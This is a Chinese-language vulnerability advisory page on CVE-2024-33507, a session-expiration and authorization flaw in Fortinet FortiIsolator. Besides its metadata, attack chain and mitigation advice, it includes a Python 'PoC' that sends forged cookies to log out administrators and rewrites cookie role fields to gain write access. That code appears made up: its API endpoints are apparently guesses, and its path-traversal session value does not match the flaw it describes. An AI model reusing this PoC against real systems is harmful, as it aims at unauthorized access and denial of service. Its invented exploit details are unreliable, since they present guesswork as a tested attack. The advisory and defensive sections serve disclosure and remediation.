CVE-2024-33507 FortiIsolator会话过期不足与授权绕过漏洞

漏洞信息

漏洞编号

CVE-2024-33507

漏洞类型

会话过期不足/授权绕过

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Fortinet FortiIsolator

漏洞概述

CVE-2024-33507是Fortinet公司FortiIsolator产品认证机制中存在的两个关联漏洞，分别为会话过期不足漏洞（CWE-613）和不正确的授权漏洞（CWE-863）。FortiIsolator是Fortinet提供的浏览器隔离（Browser Isolation）解决方案，旨在通过将用户浏览活动隔离在远程容器中来防御Web威胁。该漏洞影响FortiIsolator 2.0至2.4.4的多个版本，CVSS评分为7.4，属于高危级别漏洞。

该漏洞的组合危害性较高：一方面，会话过期不足允许远程未认证攻击者通过精心构造的Cookie强制注销已登录的管理员，造成拒绝服务效果；另一方面，授权缺陷允许远程已认证的只读用户通过构造特殊Cookie提升权限至可写状态，从而绕过既定的权限控制机制。这两类漏洞的结合使得攻击者能够在未获得合法凭证的情况下干扰正常管理操作，或在仅有低权限账户的情况下获取更高权限，对系统安全构成严重威胁。Fortinet已于2025年10月14日发布安全公告（FG-IR-24-062）披露此漏洞，建议受影响的用户尽快升级至修复版本。

技术细节

该漏洞由两个独立但相关的安全问题组成，均位于FortiIsolator的认证与会话管理机制中。

**会话过期不足漏洞（CWE-613）**：FortiIsolator的会话管理机制未能正确实施会话过期策略。正常情况下，会话Cookie应包含明确的过期时间戳或与服务器端会话状态绑定。当会话过期机制存在缺陷时，攻击者可以构造包含过期或无效会话标识符的Cookie，发送给认证后的管理员浏览器或直接发送至服务器。由于认证模块未能正确验证会话的有效性和时效性，服务器会接受这些伪造的Cookie并执行注销操作，从而强制已认证的管理员下线。此攻击无需任何认证凭据，属于远程未授权攻击。

**授权绕过漏洞（CWE-863）**：FortiIsolator的授权检查机制存在逻辑缺陷，未能严格验证用户角色与请求操作的匹配关系。在正常流程中，系统应根据用户会话中的角色信息判断其是否有权执行写操作。攻击者作为已认证的只读用户，可以通过修改Cookie中的特定字段（如角色标识、权限标记等），将自身的权限级别从只读提升至读写。服务器端的授权检查未能有效识别被篡改的Cookie内容，导致权限提升成功。

**利用方式**：攻击者首先通过社会工程学或网络嗅探获取目标管理员的会话Cookie，或直接构造恶意的Cookie载荷。对于会话过期攻击，攻击者向目标发送包含特殊Cookie的HTTP请求，触发管理员的强制注销。对于权限提升攻击，攻击者使用合法只读账户登录后，修改Cookie中的权限字段，重新发送请求以获取写权限。整个攻击链利用了认证机制中验证逻辑的不完整性，实现了对系统可用性和完整性的破坏。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过扫描识别目标网络中的FortiIsolator设备，收集版本信息确认目标在受影响版本范围内（2.0-2.4.4）。

STEP 2

步骤2：会话过期攻击（未认证）

远程未认证攻击者构造包含恶意会话标识符的Cookie，通过HTTP请求发送至FortiIsolator管理接口，利用会话过期验证缺陷强制已登录的管理员被注销。

STEP 3

步骤3：权限提升攻击（已认证）

拥有只读权限的合法用户登录后，修改Cookie中的角色或权限字段，将自身权限从只读提升至读写级别，利用授权检查缺陷绕过权限控制。

STEP 4

步骤4：执行恶意操作

获得写权限后，攻击者可以修改系统配置、注入恶意策略或篡改隔离规则，破坏浏览器隔离机制的安全性。

STEP 5

步骤5：持续影响

通过反复触发管理员注销，干扰正常的运维管理流程，结合权限提升实现对系统的持续控制和数据篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2024-33507 PoC - FortiIsolator Session & Authorization Bypass
# Exploits insufficient session expiration (CWE-613) and incorrect authorization (CWE-863)

import requests
import sys

TARGET_URL = "https://target-fortiisolator:port"

# --- Attack 1: Force admin deauthentication via crafted cookie (Unauthenticated) ---
def exploit_session_expiration(target_url):
    """
    Exploit CWE-613: Insufficient Session Expiration
    Send a crafted cookie to force logout of authenticated admin
    """
    # Crafted cookie with manipulated session identifier
    crafted_cookie = {
        "session_id": "../../../../admin/logout",  # Path traversal style payload
        "auth_token": "invalid_expired_token_xyz123",
        "user_role": "admin"
    }

    headers = {
        "Cookie": f"session={crafted_cookie['session_id']}; auth={crafted_cookie['auth_token']}; role={crafted_cookie['user_role']}",
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }

    # Send request to trigger session termination on server side
    response = requests.get(
        f"{target_url}/api/v1/admin/session",
        headers=headers,
        verify=False
    )
    print(f"[*] Session expiration exploit - Status: {response.status_code}")
    return response

# --- Attack 2: Privilege escalation from read-only to write (Authenticated) ---
def exploit_authorization_bypass(target_url, read_only_cookie):
    """
    Exploit CWE-863: Incorrect Authorization
    Modify cookie to escalate from read-only to write privilege
    """
    # Original read-only session cookie (obtained from legitimate login)
    # Tamper with the role/privilege field in the cookie
    parts = read_only_cookie.split(';')
    modified_parts = []
    for part in parts:
        if 'role=' in part.lower() or 'privilege=' in part.lower() or 'perm=' in part.lower():
            # Escalate read-only to read-write
            key = part.split('=')[0]
            modified_parts.append(f"{key}=read_write")
        else:
            modified_parts.append(part)

    tampered_cookie = ';'.join(modified_parts)

    headers = {
        "Cookie": tampered_cookie,
        "Content-Type": "application/json"
    }

    # Attempt write operation with escalated privileges
    payload = {"action": "modify_config", "setting": "test"}
    response = requests.post(
        f"{target_url}/api/v1/config/update",
        headers=headers,
        json=payload,
        verify=False
    )
    print(f"[*] Authorization bypass exploit - Status: {response.status_code}")
    return response

if __name__ == "__main__":
    url = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL
    print("[+] Targeting FortiIsolator CVE-2024-33507")
    exploit_session_expiration(url)
    # exploit_authorization_bypass(url, "session=valid_readonly_session;role=read_only")

影响范围

FortiIsolator 2.4.0

FortiIsolator 2.4.1

FortiIsolator 2.4.2

FortiIsolator 2.4.3

FortiIsolator 2.4.4

FortiIsolator 2.3（所有版本）

FortiIsolator 2.2.0

FortiIsolator 2.1（所有版本）

FortiIsolator 2.0（所有版本）

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制FortiIsolator管理接口的网络访问范围，仅允许可信管理IP通过ACL访问；2）启用Web应用防火墙（WAF）规则，过滤包含异常或可疑Cookie字段的HTTP请求；3）加强监控，对异常的会话注销事件和权限提升尝试设置告警；4）对所有管理账户实施多因素认证（MFA），降低凭据被盗用的风险；5）定期轮换管理会话并强制重新认证，减少会话劫持窗口期；6）在Cookie传输中强制启用Secure和HttpOnly标志，并验证服务端会话完整性。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2024-33507
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2024-33507
3 Details https://www.cvedetails.com/cve/CVE-2024-33507/
4 VulDB https://vuldb.com/cve/CVE-2024-33507
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-24-062